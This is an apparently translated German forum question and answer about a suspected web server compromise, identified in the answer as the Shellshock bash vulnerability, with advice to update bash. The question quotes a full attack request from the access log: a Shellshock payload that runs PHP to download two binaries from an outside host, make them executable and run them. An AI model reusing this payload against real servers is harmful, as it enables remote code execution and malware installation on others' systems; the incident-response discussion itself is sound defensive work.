Wir haben Binärdateien entdeckt /tmp/susu1und /tmp/susu2vom Webserver-Benutzer ausgeführt.
In den Protokollen haben wir die folgenden Einträge:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Allerdings fanden wir von solchen Anfragen nur die Fehlercodes 301, 302, 403, 404, 500. Keinen 200er Code der darauf hinweisen würde, dass der Hack erfolgreich war.
Handelt es sich hierbei um ein weit verbreitetes Sicherheitsproblem? Wie kann es behoben werden? Oder wie kann es weiter aufgespürt werden?
Antwort1
Dies scheint ein Schockangriff zu sein; er wurde erstmals am 24. September 2014 angekündigt, als die Bash den Fix für diesen Fehler veröffentlichte.
Der erste Fehler führt dazu, dass Bash unbeabsichtigt Befehle ausführt, wenn die Befehle an das Ende von Funktionsdefinitionen angehängt werden, die in den Werten von Umgebungsvariablen gespeichert sind.1[6] Innerhalb weniger Tage nach der Veröffentlichung dieses Dokuments wurden bei einer intensiven Untersuchung der zugrunde liegenden Designfehler eine Reihe damit verbundener Schwachstellen entdeckt (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 und CVE-2014-7187), die Ramey mit einer Reihe weiterer Patches behoben hat.
Sie können überprüfen, ob Ihr System anfällig ist, wie inWie teste ich, ob mein Server für den ShellShock-Bug anfällig ist?
Sie müssen Ihr System oder zumindest Ihre Bash-Version aktualisieren, um das Problem zu beheben.